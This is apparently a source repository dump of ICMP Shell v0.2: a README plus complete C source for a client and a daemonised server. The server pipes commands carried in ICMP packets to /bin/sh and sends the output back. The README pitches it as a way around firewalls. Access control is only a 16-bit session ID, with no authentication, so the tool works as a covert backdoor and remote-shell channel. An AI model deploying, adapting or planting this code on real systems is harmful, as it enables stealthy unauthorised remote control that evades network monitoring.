README.md
> fork from http://icmpshell.sourceforge.net

================================================================
         ___ ____ __  __ ____    ____  _          _ _ 
        |_ _/ ___|  \/  |  _ \  / ___|| |__   ___| | |
         | | |   | |\/| | |_) | \___ \| '_ \ / _ \ | |
         | | |___| |  | |  __/   ___) | | | |  __/ | |
        |___\____|_|  |_|_|     |____/|_| |_|\___|_|_|
                        VERSION: 0.2

               (c) eluks - all rights reserved.

                   by: Peter Kieltyka (elux)
           http://peter.eluks.com / peter@eluks.com


                      January 31, 2002
================================================================


What is ICMP Shell?
===================
ICMP Shell is a program written in C for the UNIX environment
that allows an administrator to access their computer remotely
via ICMP.


How does it work?
=================
The ISHELL server is run in daemon mode on the remote server.
When the server recieves a request from the client it will
strip the header and look at the ID field, if it matches the
the server then it will pipe the data to "/bin/sh". It will
then read the results from the pipe and send them back
to the client and the client prints the results to stdout.

By default the client and server send packets with an ICMP
type of 0 (ICMP_ECHO_REPLY), however this can be changed
on both the client and server side. ISHELL does not care what
type you send out from the client or server end, the types
do not have to match.

ISHELL does not only pipe commands to a server and send back
the output. It also works with interactive programs (ie. gdb).
However, there comes a minor problem from this. ISHELL cannot
display a shell prompt (#). The reason for that is because there
is no way to differentiate between a command an interaction with
a program. If you have any ideas on how to implement that then
I'd be more then happy to hear from you ;)


Firewall? No one said anything about a firewall!
================================================
By default ISHELL uses icmp type 0 (ICMP_ECHO_REPLY) to send/recv.
With a little bit of research I have found that icmp type 0 works
best with this program.  Other types do work, however some kernels
process ICMP_ECHO_REQUEST packets automatically (BSD) while others
do not (Linux).


Installation
============
Call 'make' and follow the instructions.


Files
=====
MD5 (ish.c)      = 07934540ee7ca6ac7919bb1ea49fd7ff
MD5 (ish_main.c) = e2885ef2eb7688caff9b45f8c81daf8f
MD5 (ish_open.c) = 81b11fce190a321a02b5313b1b244aa7
MD5 (ishd.c)     = de574728574dc3a8d5389172ca4e3b6a
MD5 (ishell.h)   = 380b110ba648164a82a0ffddbb0920f9


The server/client have been tested on:
- Linux Mandrake 8.1   x86
- FreeBSD 4.4          x86
- OpenBSD 3.0          x86
- Solaris 8            sparc


Some IMPORTANT words on the usage
=================================
1.) ISHELL uses raw sockets on both the client and server
side, therefore root privileges ARE REQUIRED to use this
program.

2.) When configuring the options for the server/client make
sure the following options are the same on both the
client and the server:

-i <id>
-p <packetsize>


Usage: Server
=============
ICMP Shell v0.1  (server)   -   by: Peter Kieltyka
usage: ./ishd [options]

options:
 -h               Display this screen
 -d               Run server in debug mode
 -i <id>          Set session id; range: 0-65535 (default: 1515)
 -t <type>        Set ICMP type (default: 0)
 -p <packetsize>  Set packet size (default: 512)

example:
./ishd -i 65535 -t 0 -p 1024


Usage: Client
=============
ICMP Shell v0.1  (client)   -   by: Peter Kieltyka
usage: ./ish [options] <host>

options:
 -i <id>          Set session id; range: 0-65535 (default: 1515)
 -t <type>        Set ICMP type (default: 0)
 -p <packetsize>  Set packet size (default: 512)

example:
./ish -i 65535 -t 0 -p 1024 host.com


ICMP Type Reference
===================

Here is a list of icmp types that you can use with ISHELL:

Type    Name                                    Reference
----    -------------------------               ---------
  0     Echo Reply                               [RFC792]
  1     Unassigned                                  [JBP]
  2     Unassigned                                  [JBP]
  3     Destination Unreachable                  [RFC792]
  4     Source Quench                            [RFC792]
  5     Redirect                                 [RFC792]
  6     Alternate Host Address                      [JBP]
  7     Unassigned                                  [JBP]
  8     Echo                                     [RFC792]
  9     Router Advertisement                    [RFC1256]
 10     Router Selection                        [RFC1256]
 11     Time Exceeded                            [RFC792]
 12     Parameter Problem                        [RFC792]
 13     Timestamp                                [RFC792]
 14     Timestamp Reply                          [RFC792]
 15     Information Request                      [RFC792]
 16     Information Reply                        [RFC792]
 17     Address Mask Request                     [RFC950]
 18     Address Mask Reply                       [RFC950]
 19     Reserved (for Security)                    [Solo]
 20-29  Reserved (for Robustness Experiment)        [ZSu]
 30     Traceroute                              [RFC1393]
 31     Datagram Conversion Error               [RFC1475]
 32     Mobile Host Redirect              [David Johnson]
 33     IPv6 Where-Are-You                 [Bill Simpson]
 34     IPv6 I-Am-Here                     [Bill Simpson]
 35     Mobile Registration Request        [Bill Simpson]
 36     Mobile Registration Reply          [Bill Simpson]
 37     Domain Name Request                     [Simpson]
 38     Domain Name Reply                       [Simpson]
 39     SKIP                                    [Markson]
 40     Photuris                                [Simpson]
 41-255 Reserved                                    [JBP]




ChangeLog
Jan. 31. 2002   Peter Kieltyka <peter@eluks.com>

	* Fixed a compiling problem that was encountered on some Solaris machines
	* Changed AF_LOCAL to AF_UNIX in ish_open functions
	* Rearranged headers in ishell.h
	* Changed u_intXX_t variables to uintXX_t




ish.c
/*
 * ISHELL: client
 *
 * by: Peter Kieltyka (elux)
 * http://peter.eluks.com / peter@eluks.com
 *
 */

#include "ishell.h"

/* function prototypes */
void    usage(char *);
void    ish_timeout(int);
int     ish_prompt(int, struct sockaddr *, socklen_t);

void
usage(char *program) {
    fprintf(stderr,
    "ICMP Shell v%s  (client)   -   by: Peter Kieltyka\n"
    "usage: %s [options] <host>\n\n"
    "options:\n"
    " -i <id>          Set session id; range: 0-65535 (default: 1515)\n"
    " -t <type>        Set ICMP type (default: 0)\n"
    " -p <packetsize>  Set packet size (default: 512)\n"
    "\nexample:\n"
    "%s -i 65535 -t 0 -p 1024 host.com\n"
    "\n", VERSION, program, program);

    exit(-1);
}

void
ish_timeout(int empty) {
    printf("failed.\n\n");
    exit(-1);
}

int
ish_prompt(int sockfd, struct sockaddr *sin, socklen_t sinlen) {
    fd_set  rset;
    int     n, maxfd;
    char    send_buf[ish_info.packetsize], recv_buf[ish_info.packetsize];

    while(1) {
        FD_ZERO(&rset);

        FD_SET(STDIN_FILENO, &rset);
        FD_SET(sockfd, &rset);
        maxfd = MAX(STDIN_FILENO, sockfd) + 1;

        select(maxfd, &rset, NULL, NULL, NULL);

        if(FD_ISSET(sockfd, &rset)) {
            memset(recv_buf, 0, sizeof(recv_buf));
            n = ish_recv(sockfd, recv_buf, sin, sinlen);

            if(n == 0)
                fprintf(stdout, "%s", recv_buf);
            else if(n == CNTRL_CEXIT)
                exit(0);
        }

        if(FD_ISSET(STDIN_FILENO, &rset)) {
            memset(send_buf, 0, sizeof(send_buf));
            read(STDIN_FILENO, send_buf, sizeof(send_buf));

            if(ish_send(sockfd, send_buf, sin, sinlen) < 0)
                error_msg();
        }
    }
}

int
main(int argc, char *argv[]) {
    int     sockfd;
    char    *host, opt;
    struct  sockaddr_in sin;
    struct  hostent *he;

    if(argc < 2)
        usage(argv[0]);

    while((opt = getopt(argc, argv, "i:t:p:")) != -1) {
        switch(opt) {
        	case 'i':
            	ish_info.id = atoi(optarg);
            	break;
        	case 't':
            	ish_info.type = atoi(optarg);
            	break;
        	case 'p':
            	ish_info.packetsize = atoi(optarg);
            	break;
        	default:
            	usage(argv[0]);
            	break;
        }
    }
    host = argv[argc-1];

    if((he = gethostbyname(host)) == NULL) {
        fprintf(stderr, "Error: Cannot resolve %s!\n", host);
        exit(-1);
    }

    sin.sin_family = AF_INET;
    sin.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(sin.sin_zero), 0, 8);

    if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1)
        error_msg();

    sendhdr.cntrl = 0;
    sendhdr.cntrl |= CNTRL_CPOUT;

    printf("\nICMP Shell v%s  (client)   -   by: Peter Kieltyka\n", VERSION);
    printf("--------------------------------------------------\n");
    printf("\nConnecting to %s...", host);

    setvbuf(stdout, NULL, _IONBF, 0);
    fflush(stdout);

    if(ish_send(sockfd, "id\n", (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        printf("failed.\n\n");
        error_msg();
    }

    signal(SIGALRM, ish_timeout);
    alarm(10);

    if(ish_recv(sockfd, NULL, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        printf("failed.\n\n");
        error_msg();
    }
    alarm(0);

    printf("done.\n\n");
    printf("# ");


    ish_prompt(sockfd, (struct sockaddr *)&sin, sizeof(sin));

    close(sockfd);
    exit(0);
}



ishell.h
/*
 * ISHELL: header
 *
 * by: Peter Kieltyka (elux)
 * http://peter.eluks.com / peter@eluks.com
 *
 */

#ifndef __i_shell_h
#define __i_shell_h

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <fcntl.h>
#include <netdb.h>


struct ish_hdr {
    uint16_t   cntrl;          /* ish flag control                  */
    uint32_t   ts;             /* timestamp when sent               */
};

struct ish_track {
    uint16_t   id;             /* ish id                            */
    uint8_t    type;           /* icmp type to send packet as       */
    uint16_t   packetsize;     /* packetsize of data                */
    uint32_t   seq;            /* sequence number tracking          */
};


#define VERSION         "0.2"   /* ishell version                    */

#ifndef MAX
#define MAX(a,b)        ((a)>(b)?(a):(b))
#endif

#define CNTRL_CEXIT     1       /* client exited                     */
#define CNTRL_CPOUT     2       /* client packet out                 */


/* function prototypes */
int     popen2(const char *);
int     pclose2(int);

int     ish_send(int, char *, struct sockaddr *, socklen_t);
int     ish_recv(int, char *, struct sockaddr *, socklen_t);

void    error_msg(void);
u_short in_cksum(u_short *, int);


/* global variables    */
extern  struct ish_track ish_info;
extern  struct ish_hdr sendhdr;

#endif



ish_main.c
/*
 * ISHELL: main
 *
 * by: Peter Kieltyka (elux)
 * http://peter.eluks.com / peter@eluks.com
 *
 */

#include "ishell.h"

struct  ish_track ish_info = {
                1515,   /* ish id                       */
                0,      /* icmp type to send packet as  */
                512     /* packetsize                   */
                };

struct  ish_hdr sendhdr;

int
ish_send(int sockfd, char *send_buf, struct sockaddr *sin, socklen_t sinlen) {
    int     datalen = sizeof(struct icmp) + sizeof(struct ish_hdr) + strlen(send_buf);
    char    datagram[datalen];
    char    *ish  = datagram + sizeof(struct icmp);
    char    *data = datagram + sizeof(struct icmp) + sizeof(struct ish_hdr);
    struct  icmp *icmph = (struct icmp *)datagram;

    memset(datagram, 0, sizeof(datagram));

    memcpy(data, send_buf, strlen(send_buf));
    memcpy(ish, &sendhdr, sizeof(struct ish_hdr));

    icmph->icmp_type  = ish_info.type;
    icmph->icmp_code  = 0;
    icmph->icmp_id    = ish_info.id;
    icmph->icmp_seq   = ish_info.seq;
    icmph->icmp_cksum = 0;
    icmph->icmp_cksum = in_cksum((u_short *)datagram, datalen);

    if(sendto(sockfd, datagram, datalen, 0, sin, sinlen) < 0)
        return(-1);

    return(0);
}

int
ish_recv(int sockfd, char *recv_buf, struct sockaddr *sin, socklen_t sinlen) {
    int     datalen = ish_info.packetsize + sizeof(struct ip) + 
                      sizeof(struct icmp) + sizeof(struct ish_hdr);

    int     n;
    char    datagram[datalen];
    struct  icmp    *icmph   = (struct icmp *)(datagram + sizeof(struct ip));
    struct  ish_hdr *recvhdr = (struct ish_hdr *)(datagram + sizeof(struct ip) + sizeof(struct icmp));
    char    *data            = datagram + sizeof(struct ip) + sizeof(struct icmp) + sizeof(struct ish_hdr);

    memset(datagram, 0, sizeof(datagram));
    n = recvfrom(sockfd, datagram, sizeof(datagram), 0, sin, &sinlen);

    if(icmph->icmp_id != ish_info.id)
        return(-1);


    if(recv_buf != NULL) {
        memset(recv_buf, 0, sizeof(recv_buf));
        memcpy(recv_buf, data, strlen(data));
    }

    if(recvhdr->cntrl & CNTRL_CEXIT)
        return(CNTRL_CEXIT);
    else if(recvhdr->cntrl & CNTRL_CPOUT)
        return(CNTRL_CPOUT);

    return(0);
}

void
error_msg(void) {
    fprintf(stderr, "Error: %s.\n", strerror(errno));
    exit(-1);
}

/* This function is taken from the public domain version of Ping */
unsigned short
in_cksum(unsigned short *addr, int len) {
    int             nleft = len;
    int             sum = 0;
    unsigned short  *w = addr;
    unsigned short  answer = 0;

    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while(nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    /* 4mop up an odd byte, if necessary */
    if(nleft == 1) {
        *(unsigned char *)(&answer) = *(unsigned char *)w ;
        sum += answer;
    }

    /* 4add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
    sum += (sum >> 16);                 /* add carry */
    answer = ~sum;                      /* truncate to 16 bits */
    return(answer);
}



ish_open.c
/*
 * ISHELL: command execution functions
 *
 * by: Peter Kieltyka (elux)
 * http://peter.eluks.com / peter@eluks.com
 *
 * Note: The functions below are derived from code bighawk
 * previously wrote as a substitute for popen().
 *
 */

#include "ishell.h"

#ifndef OPEN_MAX
#define OPEN_MAX 1024
#endif

static  pid_t *childpid = NULL;

int
popen2(const char *commandstring) {
    int i, fds[2];
    pid_t pid;

    if(childpid == NULL)
        if((childpid = calloc(OPEN_MAX, sizeof(pid_t))) == NULL)
            return -1;

    if(socketpair(AF_UNIX, SOCK_STREAM, 0, fds) == -1)
        return -1;

    if((pid = fork()) < 0)
        return -1;
    else if(pid == 0) {
        close(fds[1]);
        if(fds[0] != STDIN_FILENO) {
            dup2(fds[0], STDIN_FILENO);
            close(fds[0]);
        }
        dup2(STDIN_FILENO, STDOUT_FILENO);
        dup2(STDOUT_FILENO, STDERR_FILENO);
      
        for(i = 0; i < OPEN_MAX; i++) {
            if(childpid[i] > 0)
            close(i);
        }
        execl("/bin/sh", "sh", "-c", commandstring, NULL);
        _exit(127);
    }

    close(fds[0]);
    childpid[fds[1]] = pid;
    return(fds[1]);
}

int
pclose2(int fd) {
    int stat;
    pid_t pid;   

    if(childpid == NULL)
        return -1;

    if(childpid[fd] == 0)
        return -1;

    close(fd);
  
    pid = childpid[fd];

    while(waitpid(pid, &stat, 0) == -1)
        if(errno != EINTR)
            return -1;

    return(stat);
}



ishd.c
/*
 * ISHELL: server
 *
 * by: Peter Kieltyka (elux)
 * http://peter.eluks.com / peter@eluks.com
 *
 */

#include "ishell.h"

/* global variables */
int     ish_debug = 1;

/* function prototypes */
void    usage(char *);
void    sig_handle(int);
int     edaemon(void);
int     ish_listen(int, struct sockaddr *, socklen_t);

void
usage(char *program) {
    fprintf(stderr,
    "ICMP Shell v%s  (server)   -   by: Peter Kieltyka\n"
    "usage: %s [options]\n\n"
    "options:\n"
    " -h               Display this screen\n"
    " -d               Run server in debug mode\n"
    " -i <id>          Set session id; range: 0-65535 (default: 1515)\n"
    " -t <type>        Set ICMP type (default: 0)\n"
    " -p <packetsize>  Set packet size (default: 512)\n"
    "\nexample:\n"
    "%s -i 65535 -t 0 -p 1024\n"
    "\n", VERSION, program, program);


    exit(-1);
}

void
sig_handle(int empty) {
    return;
}

int
edaemon(void) {
    pid_t   pid;
    int     fd;

    if((pid = fork()) < 0) {
        return -1;
    } else if(pid != 0) {
        exit(0);
    }

    setsid();
    chdir("/");
    umask(0);

    if((fd = open("/dev/null", O_WRONLY, 0)) == -1)
        return -1;

    dup2(fd, STDIN_FILENO);
    dup2(fd, STDOUT_FILENO);
    dup2(fd, STDERR_FILENO);
    
    close(fd);

    return 0;
}

int
ish_listen(int sockfd, struct sockaddr *sin, socklen_t sinlen) {
    fd_set  rset;
    int     n, fd, maxfd;
    char    send_buf[ish_info.packetsize], recv_buf[ish_info.packetsize];

    fd = popen2("/bin/sh");
    sendhdr.cntrl = 0;

    while(1) {
        FD_ZERO(&rset);

        FD_SET(fd, &rset);
        FD_SET(sockfd, &rset);
        maxfd = MAX(fd, sockfd) + 1;

        select(maxfd, &rset, NULL, NULL, NULL);

        if(FD_ISSET(sockfd, &rset)) {
            memset(recv_buf, 0, sizeof(recv_buf));
            if(ish_recv(sockfd, recv_buf, sin, sinlen) == CNTRL_CPOUT) {
                write(fd, recv_buf, strlen(recv_buf));

                fprintf(stderr, "-----+ IN DATA +------\n%s", recv_buf);
            }
        }

        if(FD_ISSET(fd, &rset)) {
            memset(send_buf, 0, sizeof(send_buf));

            sendhdr.ts = 0;
            ish_info.seq++;

            if ((n = read(fd, send_buf, sizeof(send_buf)-1)) == 0)
                sendhdr.cntrl |= CNTRL_CEXIT;

            fprintf(stderr, "-----+ OUT DATA +-----\n%s\n", send_buf);

            if (ish_send(sockfd, send_buf, sin, sinlen) < 0)
                error_msg();

            if(n == 0) break;
        }
    }

    pclose2(fd);
    return(0);
}

int
main(int argc, char *argv[]) {
    int     opt, sockfd;
    struct  sockaddr_in sin;

    while((opt = getopt(argc, argv, "hdi:t:p:")) != -1) {
        switch(opt) {
        	case 'h':
            	usage(argv[0]);
            	break;
        	case 'd':
            	ish_debug = 0;
            	break;
        	case 'i':
            	ish_info.id = atoi(optarg);
            	break;
        	case 't':
            	ish_info.type = atoi(optarg);
            	break;
        	case 'p':
            	ish_info.packetsize = atoi(optarg);
            	break;
        }
    }

    if(ish_debug) {
        if(edaemon() != 0) {
            fprintf(stderr, "Cannot start server as daemon!\n");
            exit(-1);
        }
    }

    sin.sin_family = AF_INET;
    memset(&(sin.sin_zero), 0, 8);

    if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1)
        error_msg();

    signal(SIGPIPE, sig_handle);
    while(ish_listen(sockfd, (struct sockaddr *)&sin, sizeof(sin)) == 0);

    close(sockfd);
    exit(0);
}

